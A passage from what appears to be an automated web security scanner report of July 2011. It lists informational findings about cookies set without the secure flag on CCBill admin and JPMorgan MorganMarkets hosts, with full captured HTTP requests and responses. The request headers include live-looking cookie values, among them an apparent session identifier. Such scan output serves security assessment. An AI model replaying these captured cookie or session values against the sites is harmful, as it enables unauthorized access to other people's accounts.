Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:10 GMT
Last-Modified: Mon, 24 Aug 2009 20:31:51 GMT
ETag: "137b6e-2f2-471e91b965bc0"
Accept-Ranges: bytes
Content-Length: 754
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR................a....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDAT8....k.a.......n....F..(FP...F.FT...ll.... .6*.Z.NP.5.">Q...]..1....d.1....H.......Q...p.......;}.......
...[SNIP]...

7.50. https://admin.ccbill.com/style/images/exclamation_icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/exclamation_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/exclamation_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Tue, 28 Jul 2009 22:35:58 GMT
ETag: "40502-320-46fcbb1bf6f80"
Accept-Ranges: bytes
Content-Length: 800
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR................a....sBIT....|.d.... pHYs............X....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.01/22/09.......|IDAT8...KlLa....w.3=g.m..v:.R.m'..i.......VM,...+Q.H..
...[SNIP]...

7.51. https://admin.ccbill.com/style/images/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/s.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/s.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Mon, 12 Jan 2009 22:39:35 GMT
ETag: "4047f-2b-46050c7f1b7c0"
Accept-Ranges: bytes
Content-Length: 43
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.............!.......,...........D..;

7.52. https://admin.ccbill.com/style/images/section_bg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/section_bg.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/section_bg.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Thu, 04 Dec 2008 21:48:04 GMT
ETag: "58041a-4fc-45d3f83e52d00"
Accept-Ranges: bytes
Content-Length: 1276
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR..............T*=....sBIT.....O.... pHYs...........~.....tEXtCreation Time.10/30/08........tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCeh
...[SNIP]...

7.53. https://admin.ccbill.com/style/images/warning_icon.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/style/images/warning_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/warning_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:10 GMT
Last-Modified: Thu, 20 Aug 2009 00:04:21 GMT
ETag: "420983-c123-471877e570b40"
Accept-Ranges: bytes
Content-Length: 49443
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR...............U^....sBIT....|.d.... pHYs...........~.....tEXtCreation Time.04/07/09..Cn....tEXtSoftware.Adobe FireworksO..N....prVWx....Q.0..`/.L..`...K..Ig.Q2.@).2@.d.......s..1._..
...[SNIP]...

7.54. https://affiliateadmin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

7.55. https://affiliateadmin.ccbill.com/ccbill.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/ccbill.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccbill.css HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
Referer: https://affiliateadmin.ccbill.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:23 GMT
Last-Modified: Mon, 24 Sep 2007 20:23:40 GMT
ETag: "40dd6-4266-43ae76567cb00"
Accept-Ranges: bytes
Content-Length: 16998
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

BODY {
scrollbar-face-color: #3876b3;
scrollbar-highlight-color: #d7d7d7;
scrollbar-3dlight-color: #cccccc;
scrollbar-darkshadow-color: #666666;
s
...[SNIP]...

7.56. https://affiliateadmin.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:25 GMT
Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT
ETag: "e7d61-1-433fb1df13ec0"
Accept-Ranges: bytes
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: TSd1de36=d97ed8a508837fe058fbda91f130c4f98e77874a1d1d18004e1c8129; Path=/

7.57. https://mm.jpmorgan.com/css/menu.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/menu.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/menu.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5331-1310119392000"
Last-Modified: Fri, 08 Jul 2011 10:03:12 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:47 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5331
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

#jpmmenu {
   height: 27px;
   width: 100%;
   position: relative;
   font-family: arial;
   font-size: 11px;
   z-index: 500;
   clear: both;
}

#jpmmenu .select {
   margin: 0;
   padding: 0;
   list-style
...[SNIP]...

7.58. https://mm.jpmorgan.com/css/morganmarkets.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/morganmarkets.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/morganmarkets.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"54402-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 54402
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/* start jpm base css changes */
body {
   margin: 0;
}

ul li {
   list-style: none outside none;
}

th,td {
   border: none;
}

/* end jpm base css changes */
   /* start jpm reset-fonts-grids
...[SNIP]...

7.59. https://mm.jpmorgan.com/css/yui/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/base.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/base.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:47 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"917-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:47 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
body{margin:10px;}h1{font-size:138.5%;}
...[SNIP]...

7.60. https://mm.jpmorgan.com/css/yui/button.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/button.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/button.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"3664-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 3664
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-button{display:-moz-inline-box;display:i
...[SNIP]...

7.61. https://mm.jpmorgan.com/css/yui/container.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/container.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/container.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"4781-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 4781
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
.yui-overlay,.yui-panel-container{visib
...[SNIP]...

7.62. https://mm.jpmorgan.com/css/yui/reset-fonts-grids.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/reset-fonts-grids.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/reset-fonts-grids.css HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; ACE_COOKIE=R1627792095

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"5745-1310119390000"
Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:53 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 5745
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
html{color:#000;background:#FFF;}body,d
...[SNIP]...

7.63. https://mm.jpmorgan.com/css/yui/sprite.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/css/yui/sprite.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/yui/sprite.png HTTP/1.1
Host: mm.jpmorgan.com
Connection: keep-alive
Referer: https://mm.jpmorgan.com/access-request/access_request.jsp
